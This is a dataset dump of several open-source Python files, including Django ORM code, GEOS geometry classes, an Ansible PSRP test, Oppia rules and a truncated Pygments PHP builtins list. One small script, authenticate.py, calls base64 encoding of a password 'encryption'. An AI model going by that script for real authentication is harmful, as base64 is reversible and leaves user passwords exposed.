repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
rooshilp/CMPUT410W15-project
|
testenv/lib/python2.7/site-packages/django/db/models/related.py
|
62
|
3102
|
from collections import namedtuple
from django.utils.encoding import smart_text
from django.db.models.fields import BLANK_CHOICE_DASH
# PathInfo is used when converting lookups (fk__somecol). The contents
# describe the relation in Model terms (model Options and Fields for both
# sides of the relation. The join_field is the field backing the relation.
PathInfo = namedtuple('PathInfo',
'from_opts to_opts target_fields join_field '
'm2m direct')
class RelatedObject(object):
def __init__(self, parent_model, model, field):
self.parent_model = parent_model
self.model = model
self.opts = model._meta
self.field = field
self.name = '%s:%s' % (self.opts.app_label, self.opts.model_name)
self.var_name = self.opts.model_name
def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH,
limit_to_currently_related=False):
"""Returns choices with a default blank choices included, for use
as SelectField choices for this field.
Analogue of django.db.models.fields.Field.get_choices, provided
initially for utilization by RelatedFieldListFilter.
"""
first_choice = blank_choice if include_blank else []
queryset = self.model._default_manager.all()
if limit_to_currently_related:
queryset = queryset.complex_filter(
{'%s__isnull' % self.parent_model._meta.model_name: False})
lst = [(x._get_pk_val(), smart_text(x)) for x in queryset]
return first_choice + lst
def get_db_prep_lookup(self, lookup_type, value, connection, prepared=False):
# Defer to the actual field definition for db prep
return self.field.get_db_prep_lookup(lookup_type, value,
connection=connection, prepared=prepared)
def editable_fields(self):
"Get the fields in this class that should be edited inline."
return [f for f in self.opts.fields + self.opts.many_to_many if f.editable and f != self.field]
def __repr__(self):
return "<RelatedObject: %s related to %s>" % (self.name, self.field.name)
def get_accessor_name(self):
# This method encapsulates the logic that decides what name to give an
# accessor descriptor that retrieves related many-to-one or
# many-to-many objects. It uses the lower-cased object_name + "_set",
# but this can be overridden with the "related_name" option.
if self.field.rel.multiple:
# If this is a symmetrical m2m relation on self, there is no reverse accessor.
if getattr(self.field.rel, 'symmetrical', False) and self.model == self.parent_model:
return None
return self.field.rel.related_name or (self.opts.model_name + '_set')
else:
return self.field.rel.related_name or (self.opts.model_name)
def get_cache_name(self):
return "_%s_cache" % self.get_accessor_name()
def get_path_info(self):
return self.field.get_reverse_path_info()
|
gpl-2.0
|
Jason-Gew/Python_modules
|
authenticate.py
|
1
|
2754
|
#!/usr/bin/env python
#
# authenticate.py module is create by Jason/Ge Wu
# Purpose to fast set up and verify username & password
# for system or software access.
from getpass import getpass # Disable password display on console
import base64 # If necessary, use more advanced encryption such as AES, MD5
encryp_pass = ""
def set_authentication(pass_length, set_timeout):
global encryp_pass
while set_timeout > 0:
select1 = raw_input("\nWould you like to setup a new Password for Login? (Y/n): ")
if select1 == 'Y' or select1 == 'y':
while set_timeout > 0:
buff1 = getpass(prompt = "\nPlease Enter your Password: ")
if not buff1.isspace():
buff2 = getpass(prompt = "Please Enter your Password again: ")
if buff1 == buff2:
if len(buff2) < pass_length:
print "-> Password must have {} characters or more!".format(pass_length)
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
continue
else:
encryp_pass = base64.b64encode(buff2)
print "\n ==== Password Setup Success ====\n"
del buff1, buff2
return True
else:
print "-> Password does not match! Please Try Again!\n"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
continue
else:
print "-> Invalid Password!\n"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
continue
elif select1 == 'N' or select1 == 'n':
return False
break
else:
if set_timeout > 0:
print "-> Please enter \'Y\' or \'n\' character only!"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
else:
print "\nTime Out, please re-run the program and Try Carefully!\n"
exit(1)
def console_authenticate(set_timeout):
while set_timeout > 0:
buff = getpass(prompt = "\nPlease enter your Password: ")
encryp_buffer = base64.b64encode(buff)
if encryp_buffer == encryp_pass:
print "\n ==== Authentication Success ==== \n"
del buff, encryp_buffer
return True
elif buff == '':
print "-> Password cannot be empty!\n"
set_timeout -= 1
print "-> You have {} chance(s)...".format(set_timeout)
else:
set_timeout -= 1
if set_timeout > 0:
print "-> Invalid Password, Please Try Again!"
print "-> You still have {} chance(s)...".format(set_timeout)
else:
print "\n ==== Authentication Fail ==== \n"
return False
# For testing purpose...
if __name__ == "__main__":
if set_authentication(6,4):
if console_authenticate(3):
print "Done"
else:
print "Failed"
exit(1)
else:
print "No Authentication!"
exit(0)
|
gpl-3.0
|
jrief/django-shop
|
shop/admin/defaults/customer.py
|
3
|
1832
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from django.utils.html import format_html_join
from django.utils.translation import ugettext_lazy as _
from shop.admin.customer import CustomerProxy, CustomerInlineAdminBase, CustomerAdminBase
class CustomerInlineAdmin(CustomerInlineAdminBase):
fieldsets = (
(None, {'fields': ('get_number', 'salutation')}),
(_("Addresses"), {'fields': ('get_shipping_addresses', 'get_billing_addresses')})
)
readonly_fields = ('get_number', 'get_shipping_addresses', 'get_billing_addresses')
def get_number(self, customer):
return customer.get_number() or '–'
get_number.short_description = _("Customer Number")
def get_shipping_addresses(self, customer):
addresses = [(a.as_text(),) for a in customer.shippingaddress_set.all()]
return format_html_join('', '<address>{0}</address>', addresses)
get_shipping_addresses.short_description = _("Shipping")
def get_billing_addresses(self, customer):
addresses = [(a.as_text(),) for a in customer.billingaddress_set.all()]
return format_html_join('', '<address>{0}</address>', addresses)
get_billing_addresses.short_description = _("Billing")
@admin.register(CustomerProxy)
class CustomerAdmin(CustomerAdminBase):
inlines = (CustomerInlineAdmin,)
def get_list_display(self, request):
list_display = list(super(CustomerAdmin, self).get_list_display(request))
list_display.insert(1, 'salutation')
return list_display
def salutation(self, user):
if hasattr(user, 'customer'):
return user.customer.get_salutation_display()
return ''
salutation.short_description = _("Salutation")
salutation.admin_order_field = 'customer__salutation'
|
bsd-3-clause
|
vinayan3/clpricehistory
|
django/contrib/gis/geos/linestring.py
|
411
|
5568
|
from django.contrib.gis.geos.base import numpy
from django.contrib.gis.geos.coordseq import GEOSCoordSeq
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.geometry import GEOSGeometry
from django.contrib.gis.geos.point import Point
from django.contrib.gis.geos import prototypes as capi
class LineString(GEOSGeometry):
_init_func = capi.create_linestring
_minlength = 2
#### Python 'magic' routines ####
def __init__(self, *args, **kwargs):
"""
Initializes on the given sequence -- may take lists, tuples, NumPy arrays
of X,Y pairs, or Point objects. If Point objects are used, ownership is
_not_ transferred to the LineString object.
Examples:
ls = LineString((1, 1), (2, 2))
ls = LineString([(1, 1), (2, 2)])
ls = LineString(array([(1, 1), (2, 2)]))
ls = LineString(Point(1, 1), Point(2, 2))
"""
# If only one argument provided, set the coords array appropriately
if len(args) == 1: coords = args[0]
else: coords = args
if isinstance(coords, (tuple, list)):
# Getting the number of coords and the number of dimensions -- which
# must stay the same, e.g., no LineString((1, 2), (1, 2, 3)).
ncoords = len(coords)
if coords: ndim = len(coords[0])
else: raise TypeError('Cannot initialize on empty sequence.')
self._checkdim(ndim)
# Incrementing through each of the coordinates and verifying
for i in xrange(1, ncoords):
if not isinstance(coords[i], (tuple, list, Point)):
raise TypeError('each coordinate should be a sequence (list or tuple)')
if len(coords[i]) != ndim: raise TypeError('Dimension mismatch.')
numpy_coords = False
elif numpy and isinstance(coords, numpy.ndarray):
shape = coords.shape # Using numpy's shape.
if len(shape) != 2: raise TypeError('Too many dimensions.')
self._checkdim(shape[1])
ncoords = shape[0]
ndim = shape[1]
numpy_coords = True
else:
raise TypeError('Invalid initialization input for LineStrings.')
# Creating a coordinate sequence object because it is easier to
# set the points using GEOSCoordSeq.__setitem__().
cs = GEOSCoordSeq(capi.create_cs(ncoords, ndim), z=bool(ndim==3))
for i in xrange(ncoords):
if numpy_coords: cs[i] = coords[i,:]
elif isinstance(coords[i], Point): cs[i] = coords[i].tuple
else: cs[i] = coords[i]
# If SRID was passed in with the keyword arguments
srid = kwargs.get('srid', None)
# Calling the base geometry initialization with the returned pointer
# from the function.
super(LineString, self).__init__(self._init_func(cs.ptr), srid=srid)
def __iter__(self):
"Allows iteration over this LineString."
for i in xrange(len(self)):
yield self[i]
def __len__(self):
"Returns the number of points in this LineString."
return len(self._cs)
def _get_single_external(self, index):
return self._cs[index]
_get_single_internal = _get_single_external
def _set_list(self, length, items):
ndim = self._cs.dims #
hasz = self._cs.hasz # I don't understand why these are different
# create a new coordinate sequence and populate accordingly
cs = GEOSCoordSeq(capi.create_cs(length, ndim), z=hasz)
for i, c in enumerate(items):
cs[i] = c
ptr = self._init_func(cs.ptr)
if ptr:
capi.destroy_geom(self.ptr)
self.ptr = ptr
self._post_init(self.srid)
else:
# can this happen?
raise GEOSException('Geometry resulting from slice deletion was invalid.')
def _set_single(self, index, value):
self._checkindex(index)
self._cs[index] = value
def _checkdim(self, dim):
if dim not in (2, 3): raise TypeError('Dimension mismatch.')
#### Sequence Properties ####
@property
def tuple(self):
"Returns a tuple version of the geometry from the coordinate sequence."
return self._cs.tuple
coords = tuple
def _listarr(self, func):
"""
Internal routine that returns a sequence (list) corresponding with
the given function. Will return a numpy array if possible.
"""
lst = [func(i) for i in xrange(len(self))]
if numpy: return numpy.array(lst) # ARRRR!
else: return lst
@property
def array(self):
"Returns a numpy array for the LineString."
return self._listarr(self._cs.__getitem__)
@property
def merged(self):
"Returns the line merge of this LineString."
return self._topology(capi.geos_linemerge(self.ptr))
@property
def x(self):
"Returns a list or numpy array of the X variable."
return self._listarr(self._cs.getX)
@property
def y(self):
"Returns a list or numpy array of the Y variable."
return self._listarr(self._cs.getY)
@property
def z(self):
"Returns a list or numpy array of the Z variable."
if not self.hasz: return None
else: return self._listarr(self._cs.getZ)
# LinearRings are LineStrings used within Polygons.
class LinearRing(LineString):
_minLength = 4
_init_func = capi.create_linearring
|
bsd-3-clause
|
brandond/ansible
|
test/units/plugins/connection/test_psrp.py
|
40
|
4802
|
# -*- coding: utf-8 -*-
# (c) 2018, Jordan Borean <jborean@redhat.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from io import StringIO
from ansible.playbook.play_context import PlayContext
from ansible.plugins.loader import connection_loader
pytest.importorskip("pypsrp")
class TestConnectionWinRM(object):
OPTIONS_DATA = (
# default options
(
{'_extras': {}},
{
'_psrp_auth': 'negotiate',
'_psrp_cert_validation': True,
'_psrp_configuration_name': 'Microsoft.PowerShell',
'_psrp_connection_timeout': 30,
'_psrp_message_encryption': 'auto',
'_psrp_host': 'inventory_hostname',
'_psrp_conn_kwargs': {
'server': 'inventory_hostname',
'port': 5986,
'username': None,
'password': '',
'ssl': True,
'path': 'wsman',
'auth': 'negotiate',
'cert_validation': True,
'connection_timeout': 30,
'encryption': 'auto',
'proxy': None,
'no_proxy': False,
'max_envelope_size': 153600,
'operation_timeout': 20,
},
'_psrp_max_envelope_size': 153600,
'_psrp_ignore_proxy': False,
'_psrp_operation_timeout': 20,
'_psrp_pass': '',
'_psrp_path': 'wsman',
'_psrp_port': 5986,
'_psrp_proxy': None,
'_psrp_protocol': 'https',
'_psrp_user': None
},
),
# ssl=False when port defined to 5985
(
{'_extras': {}, 'ansible_port': '5985'},
{
'_psrp_port': 5985,
'_psrp_protocol': 'http'
},
),
# ssl=True when port defined to not 5985
(
{'_extras': {}, 'ansible_port': 1234},
{
'_psrp_port': 1234,
'_psrp_protocol': 'https'
},
),
# port 5986 when ssl=True
(
{'_extras': {}, 'ansible_psrp_protocol': 'https'},
{
'_psrp_port': 5986,
'_psrp_protocol': 'https'
},
),
# port 5985 when ssl=False
(
{'_extras': {}, 'ansible_psrp_protocol': 'http'},
{
'_psrp_port': 5985,
'_psrp_protocol': 'http'
},
),
# psrp extras
(
{'_extras': {'ansible_psrp_negotiate_delegate': True}},
{
'_psrp_conn_kwargs': {
'server': 'inventory_hostname',
'port': 5986,
'username': None,
'password': '',
'ssl': True,
'path': 'wsman',
'auth': 'negotiate',
'cert_validation': True,
'connection_timeout': 30,
'encryption': 'auto',
'proxy': None,
'no_proxy': False,
'max_envelope_size': 153600,
'operation_timeout': 20,
'negotiate_delegate': True,
},
},
),
# cert validation through string repr of bool
(
{'_extras': {}, 'ansible_psrp_cert_validation': 'ignore'},
{
'_psrp_cert_validation': False
},
),
# cert validation path
(
{'_extras': {}, 'ansible_psrp_cert_trust_path': '/path/cert.pem'},
{
'_psrp_cert_validation': '/path/cert.pem'
},
),
)
# pylint bug: https://github.com/PyCQA/pylint/issues/511
# pylint: disable=undefined-variable
@pytest.mark.parametrize('options, expected',
((o, e) for o, e in OPTIONS_DATA))
def test_set_options(self, options, expected):
pc = PlayContext()
new_stdin = StringIO()
conn = connection_loader.get('psrp', pc, new_stdin)
conn.set_options(var_options=options)
conn._build_kwargs()
for attr, expected in expected.items():
actual = getattr(conn, attr)
assert actual == expected, \
"psrp attr '%s', actual '%s' != expected '%s'"\
% (attr, actual, expected)
|
gpl-3.0
|
miyucy/oppia
|
extensions/rules/set_of_unicode_string.py
|
20
|
2309
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, softwar
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rules for SetOfUnicodeString objects."""
__author__ = 'Sean Lip'
from extensions.rules import base
class Equals(base.SetOfUnicodeStringRule):
description = 'is equal to {{x|SetOfUnicodeString}}'
is_generic = False
def _evaluate(self, subject):
return set(subject) == set(self.x)
class IsSubsetOf(base.SetOfUnicodeStringRule):
description = 'is a proper subset of {{x|SetOfUnicodeString}}'
is_generic = False
def _evaluate(self, subject):
return set(subject) < set(self.x)
class IsSupersetOf(base.SetOfUnicodeStringRule):
description = 'is a proper superset of {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return set(subject) > set(self.x)
class HasElementsIn(base.SetOfUnicodeStringRule):
description = 'has elements in common with {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return bool(set(subject).intersection(set(self.x)))
class HasElementsNotIn(base.SetOfUnicodeStringRule):
description = 'has elements not in {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return bool(set(subject) - set(self.x))
class OmitsElementsIn(base.SetOfUnicodeStringRule):
description = 'omits some elements of {{x|SetOfUnicodeString}}'
is_generic = False
def _evaluate(self, subject):
return bool(set(self.x) - set(subject))
class IsDisjointFrom(base.SetOfUnicodeStringRule):
description = 'has no elements in common with {{x|SetOfUnicodeString}}'
is_generic = True
def _evaluate(self, subject):
return not bool(set(subject).intersection(set(self.x)))
|
apache-2.0
|
dosiecki/NewsBlur
|
utils/munin/newsblur_tasks_pipeline.py
|
4
|
1488
|
#!/srv/newsblur/venv/newsblur/bin/python
from utils.munin.base import MuninGraph
class NBMuninGraph(MuninGraph):
@property
def graph_config(self):
graph = {
'graph_category' : 'NewsBlur',
'graph_title' : 'NewsBlur Task Pipeline',
'graph_vlabel' : 'Feed fetch pipeline times',
'graph_args' : '-l 0',
'feed_fetch.label': 'feed_fetch',
'feed_process.label': 'feed_process',
'page.label': 'page',
'icon.label': 'icon',
'total.label': 'total',
}
return graph
def calculate_metrics(self):
return self.stats
@property
def stats(self):
import datetime
from django.conf import settings
stats = settings.MONGOANALYTICSDB.nbanalytics.feed_fetches.aggregate([{
"$match": {
"date": {
"$gt": datetime.datetime.now() - datetime.timedelta(minutes=5),
},
},
}, {
"$group": {
"_id": 1,
"feed_fetch": {"$avg": "$feed_fetch"},
"feed_process": {"$avg": "$feed_process"},
"page": {"$avg": "$page"},
"icon": {"$avg": "$icon"},
"total": {"$avg": "$total"},
},
}])
return list(stats)[0]
if __name__ == '__main__':
NBMuninGraph().run()
|
mit
|
siosio/intellij-community
|
python/helpers/pockets/iterators.py
|
30
|
8342
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 the Pockets team, see AUTHORS.
# Licensed under the BSD License, see LICENSE for details.
"""A pocket full of useful iterators!"""
from __future__ import absolute_import
import collections
import six
__all__ = ["peek_iter", "modify_iter"]
class peek_iter(object):
"""An iterator object that supports peeking ahead.
>>> p = peek_iter(["a", "b", "c", "d", "e"])
>>> p.peek()
'a'
>>> p.next()
'a'
>>> p.peek(3)
['b', 'c', 'd']
Args:
o (iterable or callable): `o` is interpreted very differently
depending on the presence of `sentinel`.
If `sentinel` is not given, then `o` must be a collection object
which supports either the iteration protocol or the sequence
protocol.
If `sentinel` is given, then `o` must be a callable object.
sentinel (any value, optional): If given, the iterator will call `o`
with no arguments for each call to its `next` method; if the value
returned is equal to `sentinel`, :exc:`StopIteration` will be
raised, otherwise the value will be returned.
See Also:
`peek_iter` can operate as a drop in replacement for the built-in
`iter <http://docs.python.org/2/library/functions.html#iter>`_
function.
Attributes:
sentinel (any value): The value used to indicate the iterator is
exhausted. If `sentinel` was not given when the `peek_iter` was
instantiated, then it will be set to a new object
instance: ``object()``.
"""
def __init__(self, *args):
"""__init__(o, sentinel=None)"""
self._iterable = iter(*args)
self._cache = collections.deque()
self.sentinel = args[1] if len(args) > 1 else object()
def __iter__(self):
return self
def __next__(self, n=None):
# NOTE: Prevent 2to3 from transforming self.next() in next(self),
# which causes an infinite loop!
return getattr(self, 'next')(n)
def _fillcache(self, n):
"""Cache `n` items. If `n` is 0 or None, then 1 item is cached."""
if not n:
n = 1
try:
while len(self._cache) < n:
self._cache.append(next(self._iterable))
except StopIteration:
while len(self._cache) < n:
self._cache.append(self.sentinel)
def has_next(self):
"""Determine if iterator is exhausted.
Returns:
bool: True if iterator has more items, False otherwise.
Note:
Will never raise :exc:`StopIteration`.
"""
return self.peek() != self.sentinel
def next(self, n=None):
"""Get the next item or `n` items of the iterator.
Args:
n (int, optional): The number of items to retrieve. Defaults to
None.
Returns:
item or list of items: The next item or `n` items of the iterator.
If `n` is None, the item itself is returned. If `n` is an int,
the items will be returned in a list. If `n` is 0, an empty
list is returned:
>>> p = peek_iter(["a", "b", "c", "d", "e"])
>>> p.next()
'a'
>>> p.next(0)
[]
>>> p.next(1)
['b']
>>> p.next(2)
['c', 'd']
Raises:
StopIteration: Raised if the iterator is exhausted, even if
`n` is 0.
"""
self._fillcache(n)
if not n:
if self._cache[0] == self.sentinel:
raise StopIteration
if n is None:
result = self._cache.popleft()
else:
result = []
else:
if self._cache[n - 1] == self.sentinel:
raise StopIteration
result = [self._cache.popleft() for i in range(n)]
return result
def peek(self, n=None):
"""Preview the next item or `n` items of the iterator.
The iterator is not advanced when peek is called.
Args:
n (int, optional): The number of items to retrieve. Defaults to
None.
Returns:
item or list of items: The next item or `n` items of the iterator.
If `n` is None, the item itself is returned. If `n` is an int,
the items will be returned in a list. If `n` is 0, an empty
list is returned.
If the iterator is exhausted, `peek_iter.sentinel` is returned,
or placed as the last item in the returned list:
>>> p = peek_iter(["a", "b", "c"])
>>> p.sentinel = "END"
>>> p.peek()
'a'
>>> p.peek(0)
[]
>>> p.peek(1)
['a']
>>> p.peek(2)
['a', 'b']
>>> p.peek(4)
['a', 'b', 'c', 'END']
Note:
Will never raise :exc:`StopIteration`.
"""
self._fillcache(n)
if n is None:
result = self._cache[0]
else:
result = [self._cache[i] for i in range(n)]
return result
class modify_iter(peek_iter):
"""An iterator object that supports modifying items as they are returned.
>>> a = [" A list ",
... " of strings ",
... " with ",
... " extra ",
... " whitespace. "]
>>> modifier = lambda s: s.strip().replace('with', 'without')
>>> for s in modify_iter(a, modifier=modifier):
... print('"%s"' % s)
"A list"
"of strings"
"without"
"extra"
"whitespace."
Args:
o (iterable or callable): `o` is interpreted very differently
depending on the presence of `sentinel`.
If `sentinel` is not given, then `o` must be a collection object
which supports either the iteration protocol or the sequence
protocol.
If `sentinel` is given, then `o` must be a callable object.
sentinel (any value, optional): If given, the iterator will call `o`
with no arguments for each call to its `next` method; if the value
returned is equal to `sentinel`, :exc:`StopIteration` will be
raised, otherwise the value will be returned.
modifier (callable, optional): The function that will be used to
modify each item returned by the iterator. `modifier` should take
a single argument and return a single value. Defaults
to ``lambda x: x``.
If `sentinel` is not given, `modifier` must be passed as a keyword
argument.
Attributes:
modifier (callable): `modifier` is called with each item in `o` as it
is iterated. The return value of `modifier` is returned in lieu of
the item.
Values returned by `peek` as well as `next` are affected by
`modifier`. However, `modify_iter.sentinel` is never passed through
`modifier`; it will always be returned from `peek` unmodified.
"""
def __init__(self, *args, **kwargs):
"""__init__(o, sentinel=None, modifier=lambda x: x)"""
if 'modifier' in kwargs:
self.modifier = kwargs['modifier']
elif len(args) > 2:
self.modifier = args[2]
args = args[:2]
else:
self.modifier = lambda x: x
if not six.callable(self.modifier):
raise TypeError('modify_iter(o, modifier): '
'modifier must be callable')
super(modify_iter, self).__init__(*args)
def _fillcache(self, n):
"""Cache `n` modified items. If `n` is 0 or None, 1 item is cached.
Each item returned by the iterator is passed through the
`modify_iter.modified` function before being cached.
"""
if not n:
n = 1
try:
while len(self._cache) < n:
self._cache.append(self.modifier(next(self._iterable)))
except StopIteration:
while len(self._cache) < n:
self._cache.append(self.sentinel)
|
apache-2.0
|
pvthuy/word2vec
|
word2vec/wordclusters.py
|
8
|
1115
|
from __future__ import division, print_function, unicode_literals
import numpy as np
class WordClusters(object):
def __init__(self, vocab, clusters):
self.vocab = vocab
self.clusters = clusters
def ix(self, word):
"""
Returns the index on self.vocab and self.clusters for `word`
"""
temp = np.where(self.vocab == word)[0]
if temp.size == 0:
raise KeyError('Word not in vocabulary')
else:
return temp[0]
def __getitem__(self, word):
return self.get_cluster(word)
def get_cluster(self, word):
"""
Returns the cluster number for a word in the vocabulary
"""
idx = self.ix(word)
return self.clusters[idx]
def get_words_on_cluster(self, cluster):
return self.vocab[self.clusters == cluster]
@classmethod
def from_text(cls, fname):
vocab = np.genfromtxt(fname, dtype=np.object, delimiter=' ', usecols=0)
clusters = np.genfromtxt(fname, dtype=int, delimiter=' ', usecols=1)
return cls(vocab=vocab, clusters=clusters)
|
apache-2.0
|
victoredwardocallaghan/pygments-main
|
pygments/lexers/_phpbuiltins.py
|
10
|
122176
|
# -*- coding: utf-8 -*-
"""
pygments.lexers._phpbuiltins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This file loads the function names and their modules from the
php webpage and generates itself.
Do not alter the MODULES dict by hand!
WARNING: the generation transfers quite much data over your
internet connection. don't run that at home, use
a server ;-)
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
MODULES = {'.NET': ['dotnet_load'],
'APC': ['apc_add',
'apc_bin_dump',
'apc_bin_dumpfile',
'apc_bin_load',
'apc_bin_loadfile',
'apc_cache_info',
'apc_cas',
'apc_clear_cache',
'apc_compile_file',
'apc_dec',
'apc_define_constants',
'apc_delete_file',
'apc_delete',
'apc_exists',
'apc_fetch',
'apc_inc',
'apc_load_constants',
'apc_sma_info',
'apc_store'],
'APD': ['apd_breakpoint',
'apd_callstack',
'apd_clunk',
'apd_continue',
'apd_croak',
'apd_dump_function_table',
'apd_dump_persistent_resources',
'apd_dump_regular_resources',
'apd_echo',
'apd_get_active_symbols',
'apd_set_pprof_trace',
'apd_set_session_trace_socket',
'apd_set_session_trace',
'apd_set_session',
'override_function',
'rename_function'],
'Aliases and deprecated Mysqli': ['mysqli_bind_param',
'mysqli_bind_result',
'mysqli_client_encoding',
'mysqli_connect',
'mysqli_disable_reads_from_master',
'mysqli_disable_rpl_parse',
'mysqli_enable_reads_from_master',
'mysqli_enable_rpl_parse',
'mysqli_escape_string',
'mysqli_execute',
'mysqli_fetch',
'mysqli_get_metadata',
'mysqli_master_query',
'mysqli_param_count',
'mysqli_report',
'mysqli_rpl_parse_enabled',
'mysqli_rpl_probe',
'mysqli_rpl_query_type',
'mysqli_send_long_data',
'mysqli_send_query',
'mysqli_set_opt',
'mysqli_slave_query'],
'Apache': ['apache_child_terminate',
'apache_get_modules',
'apache_get_version',
'apache_getenv',
'apache_lookup_uri',
'apache_note',
'apache_request_headers',
'apache_reset_timeout',
'apache_response_headers',
'apache_setenv',
'getallheaders',
'virtual'],
'Array': ['array_change_key_case',
'array_chunk',
'array_combine',
'array_count_values',
'array_diff_assoc',
'array_diff_key',
'array_diff_uassoc',
'array_diff_ukey',
'array_diff',
'array_fill_keys',
'array_fill',
'array_filter',
'array_flip',
'array_intersect_assoc',
'array_intersect_key',
'array_intersect_uassoc',
'array_intersect_ukey',
'array_intersect',
'array_key_exists',
'array_keys',
'array_map',
'array_merge_recursive',
'array_merge',
'array_multisort',
'array_pad',
'array_pop',
'array_product',
'array_push',
'array_rand',
'array_reduce',
'array_replace_recursive',
'array_replace',
'array_reverse',
'array_search',
'array_shift',
'array_slice',
'array_splice',
'array_sum',
'array_udiff_assoc',
'array_udiff_uassoc',
'array_udiff',
'array_uintersect_assoc',
'array_uintersect_uassoc',
'array_uintersect',
'array_unique',
'array_unshift',
'array_values',
'array_walk_recursive',
'array_walk',
'array',
'arsort',
'asort',
'compact',
'count',
'current',
'each',
'end',
'extract',
'in_array',
'key',
'krsort',
'ksort',
'list',
'natcasesort',
'natsort',
'next',
'pos',
'prev',
'range',
'reset',
'rsort',
'shuffle',
'sizeof',
'sort',
'uasort',
'uksort',
'usort'],
'BBCode': ['bbcode_add_element',
'bbcode_add_smiley',
'bbcode_create',
'bbcode_destroy',
'bbcode_parse',
'bbcode_set_arg_parser',
'bbcode_set_flags'],
'BC Math': ['bcadd',
'bccomp',
'bcdiv',
'bcmod',
'bcmul',
'bcpow',
'bcpowmod',
'bcscale',
'bcsqrt',
'bcsub'],
'Bzip2': ['bzclose',
'bzcompress',
'bzdecompress',
'bzerrno',
'bzerror',
'bzerrstr',
'bzflush',
'bzopen',
'bzread',
'bzwrite'],
'COM': ['com_addref',
'com_create_guid',
'com_event_sink',
'com_get_active_object',
'com_get',
'com_invoke',
'com_isenum',
'com_load_typelib',
'com_load',
'com_message_pump',
'com_print_typeinfo',
'com_propget',
'com_propput',
'com_propset',
'com_release',
'com_set',
'variant_abs',
'variant_add',
'variant_and',
'variant_cast',
'variant_cat',
'variant_cmp',
'variant_date_from_timestamp',
'variant_date_to_timestamp',
'variant_div',
'variant_eqv',
'variant_fix',
'variant_get_type',
'variant_idiv',
'variant_imp',
'variant_int',
'variant_mod',
'variant_mul',
'variant_neg',
'variant_not',
'variant_or',
'variant_pow',
'variant_round',
'variant_set_type',
'variant_set',
'variant_sub',
'variant_xor'],
'CUBRID': ['cubrid_affected_rows',
'cubrid_bind',
'cubrid_close_prepare',
'cubrid_close_request',
'cubrid_col_get',
'cubrid_col_size',
'cubrid_column_names',
'cubrid_column_types',
'cubrid_commit',
'cubrid_connect_with_url',
'cubrid_connect',
'cubrid_current_oid',
'cubrid_disconnect',
'cubrid_drop',
'cubrid_error_code_facility',
'cubrid_error_code',
'cubrid_error_msg',
'cubrid_execute',
'cubrid_fetch',
'cubrid_free_result',
'cubrid_get_charset',
'cubrid_get_class_name',
'cubrid_get_client_info',
'cubrid_get_db_parameter',
'cubrid_get_server_info',
'cubrid_get',
'cubrid_insert_id',
'cubrid_is_instance',
'cubrid_lob_close',
'cubrid_lob_export',
'cubrid_lob_get',
'cubrid_lob_send',
'cubrid_lob_size',
'cubrid_lock_read',
'cubrid_lock_write',
'cubrid_move_cursor',
'cubrid_num_cols',
'cubrid_num_rows',
'cubrid_prepare',
'cubrid_put',
'cubrid_rollback',
'cubrid_schema',
'cubrid_seq_drop',
'cubrid_seq_insert',
'cubrid_seq_put',
'cubrid_set_add',
'cubrid_set_drop',
'cubrid_version'],
'Cairo': ['cairo_create',
'cairo_font_face_get_type',
'cairo_font_face_status',
'cairo_font_options_create',
'cairo_font_options_equal',
'cairo_font_options_get_antialias',
'cairo_font_options_get_hint_metrics',
'cairo_font_options_get_hint_style',
'cairo_font_options_get_subpixel_order',
'cairo_font_options_hash',
'cairo_font_options_merge',
'cairo_font_options_set_antialias',
'cairo_font_options_set_hint_metrics',
'cairo_font_options_set_hint_style',
'cairo_font_options_set_subpixel_order',
'cairo_font_options_status',
'cairo_format_stride_for_width',
'cairo_image_surface_create_for_data',
'cairo_image_surface_create_from_png',
'cairo_image_surface_create',
'cairo_image_surface_get_data',
'cairo_image_surface_get_format',
'cairo_image_surface_get_height',
'cairo_image_surface_get_stride',
'cairo_image_surface_get_width',
'cairo_matrix_create_scale',
'cairo_matrix_create_translate',
'cairo_matrix_invert',
'cairo_matrix_multiply',
'cairo_matrix_rotate',
'cairo_matrix_transform_distance',
'cairo_matrix_transform_point',
'cairo_matrix_translate',
'cairo_pattern_add_color_stop_rgb',
'cairo_pattern_add_color_stop_rgba',
'cairo_pattern_create_for_surface',
'cairo_pattern_create_linear',
'cairo_pattern_create_radial',
'cairo_pattern_create_rgb',
'cairo_pattern_create_rgba',
'cairo_pattern_get_color_stop_count',
'cairo_pattern_get_color_stop_rgba',
'cairo_pattern_get_extend',
'cairo_pattern_get_filter',
'cairo_pattern_get_linear_points',
'cairo_pattern_get_matrix',
'cairo_pattern_get_radial_circles',
'cairo_pattern_get_rgba',
'cairo_pattern_get_surface',
'cairo_pattern_get_type',
'cairo_pattern_set_extend',
'cairo_pattern_set_filter',
'cairo_pattern_set_matrix',
'cairo_pattern_status',
'cairo_pdf_surface_create',
'cairo_pdf_surface_set_size',
'cairo_ps_get_levels',
